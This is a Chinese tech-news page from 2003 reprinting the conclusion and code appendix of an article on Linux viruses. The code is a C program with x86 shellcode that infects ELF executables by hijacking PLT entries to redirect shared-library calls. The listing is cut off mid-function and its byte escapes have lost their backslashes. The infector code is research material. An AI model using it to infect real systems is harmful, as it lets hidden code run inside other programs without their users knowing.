天极传媒:
天极网
比特网
IT专家网
52PK游戏网
极客修
全国分站

北京上海广州深港南京福建沈阳成都杭州西安长春重庆大庆合肥惠州青岛郑州泰州厦门淄博天津无锡哈尔滨

产品
  • 网页
  • 产品
  • 图片
  • 报价
  • 下载
全高清投影机 净化器 4K电视曲面电视小家电滚筒洗衣机
您现在的位置: 天极网>新闻>

Linux系统下病毒的研究

天极论坛 2003-09-09 17:04 我要吐槽
  6、结论

  本文描述了一个通过感染可执行文件PLT实现共享库调用重定向的方法。这个技术比使用LD_PRELOAD环境变量更为隐蔽。

  附录:程序代码

  由于原来代码的一个地方与新的glibc库不兼容,造成无法编译,所以对do_elf_checks函数作了一点小小的改动,nixe0n

<++> p56/PLT-INFECTION/PLT-infector.c !fda3c047
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <elf.h>

#define PAGE_SIZE 4096

static char v[] =
"x60" /* pusha */

"xb8x7dx00x00x00" /* movl $125,%eax */
"xbbx00x80x04x08" /* movl $text_start,%ebx */
"xb9x00x40x00x00" /* movl $0x4000,%ecx */
"xbax07x00x00x00" /* movl $7,%edx */
"xcdx80" /* int $0x80 */

"xa1x00x00x00x00" /* movl plt,%eax */
"xa3x00x00x00x00" /* movl %eax,oldcall */
"xc7x05x00x90x04" /* movl $newcall,plt */
"x08x00x00x00x00"

"x61" /* popa */

"xbdx00x80x04x08" /* movl $entry,%ebp */
"xffxe5" /* jmp *%ebp */

/* newcall: */

"xebx37" /* jmp msg_jmp */
/* msg_call */
"x59" /* popl %ecx */
"xb8x04x00x00x00" /* movl $4,%eax */
"xbbx01x00x00x00" /* movl $1,%ebx */
"xbax0ex00x00x00" /* movl $14,%edx */
"xcdx80" /* int $0x80 */

"xb8x00x00x00x00" /* movl $oldcall,%eax */
"xa3x00x00x00x00" /* movl %eax,plt */
"xffx75xfc" /* pushl -4(%ebp) */
"xffxd0" /* call *%eax */
"xa1x00x00x00x00" /* movl plt,%eax */
"xa3x00x00x00x00" /* movl %eax,oldcall */
"xc7x05x00x00x00" /* movl $newcall,plt */
"x08x00x00x00x00"

"x58" /* popl %eax */

"xc3" /* ret */

/* msg_jmp */
"xe8xc4xffxffxff" /* call msg_call */

"INFECTED Host "

char *get_virus(void)
{
return v;
}

int init_virus(
int plt,
int offset,
int text_start, int data_start,
int data_memsz,
int entry
)
{
int code_start = data_start + data_memsz;
int oldcall = code_start + 72;
int newcall = code_start + 51;

*(int *)&v[7] = text_start;
*(int *)&v[24] = plt;
*(int *)&v[29] = oldcall;
*(int *)&v[35] = plt;
*(int *)&v[39] = newcall;
*(int *)&v[45] = entry;
*(int *)&v[77] = plt;
*(int *)&v[87] = plt;
*(int *)&v[92] = oldcall;
*(int *)&v[98] = plt;
*(int *)&v[102] = newcall;
return 0;
}

int copy_partial(int fd, int od, unsigned int len)
{
char idata[PAGE_SIZE];
unsigned int n = 0;
int r;

while (n + PAGE_SIZE < len) {
if (read(fd, idata, PAGE_SIZE) != PAGE_SIZE) {;
perror("read");
return -1;
}

if (write(od, idata, PAGE_SIZE) < 0) {
perror("write");
return -1;
}

n += PAGE_SIZE;
}

r = read(fd, idata, len - n);
if (r < 0) {
perror("read");
return -1;
}

if (write(od, idata, r) < 0) {
perror("write");
return -1;
}

return 0;
}

void do_elf_checks(Elf32_Ehdr *ehdr)
{
if (strncmp(ehdr->e_ident, ELFMAG, SELFMAG)) {
fprintf(stderr, "File not ELF
");
exit(1);
}

if (ehdr->e_type != ET_EXEC) {
fprintf(stderr, "ELF type not ET_EXEC or ET_DYN
");
exit(1);
}

if (ehdr->e_machine != EM_386) {
fprintf(stderr, "ELF machine type not EM_386
");
exit(1);
}

if (ehdr->e_version != EV_CURRENT) {
fprintf(stderr, "ELF version not current
");
exit(1);
}
}

int do_dyn_symtab(
int fd,
Elf32_Shdr *shdr, Elf32_Shdr *shdrp,
const char *sh_function
)
{
Elf32_Shdr *strtabhdr = &shdr[shdrp->sh_link];
char *string;
Elf32_Sym *sym, *symp;
int i;

string = (char *)malloc(strtabhdr->sh_size);
if (string == NULL) {
perror("malloc");
exit(1);
}

if (lseek(
fd, strtabhdr->sh_offset, SEEK_SET) != strtabhdr->sh_offset
) {
perror("lseek");
exit(1);
}

if (read(fd, string, strtabhdr->sh_size) != strtabhdr->sh_size) {
perror("read");
exit(1);
}

sym = (Elf32_Sym *)malloc(shdrp->sh_size);
if (sym == NULL) {
perror("malloc");
exit(1);
}

if (lseek(fd, shdrp->sh_offset, SEEK_SET) != shdrp->sh_offset) {
perror("lseek");
exit(1);
}

if (read(fd, sym, shdrp->sh_size) != shdrp->sh_size) {
perror("read");
exit(1);
}

symp = sym;

for (i = 0; i < shdrp->sh_size; i += sizeof(Elf32_Sym)) {
if (!strcmp(&string[symp->st_name], sh_function)) {
free(string);
return symp - sym;
}

++symp;
}

free(string);
return -1;
}

int get_sym_number(
int fd, Elf32_Ehdr *ehdr, Elf32_Shdr *shdr, const char *sh_function
)
{
Elf32_Shdr *shdrp = shdr;
int i;

作者:责任编辑:)
请关注天极网天极新媒体 最酷科技资讯
扫码赢大奖
评论
* 网友发言均非本站立场,本站不在评论栏推荐任何网店、经销商,谨防上当受骗!
笔记本手机数码家电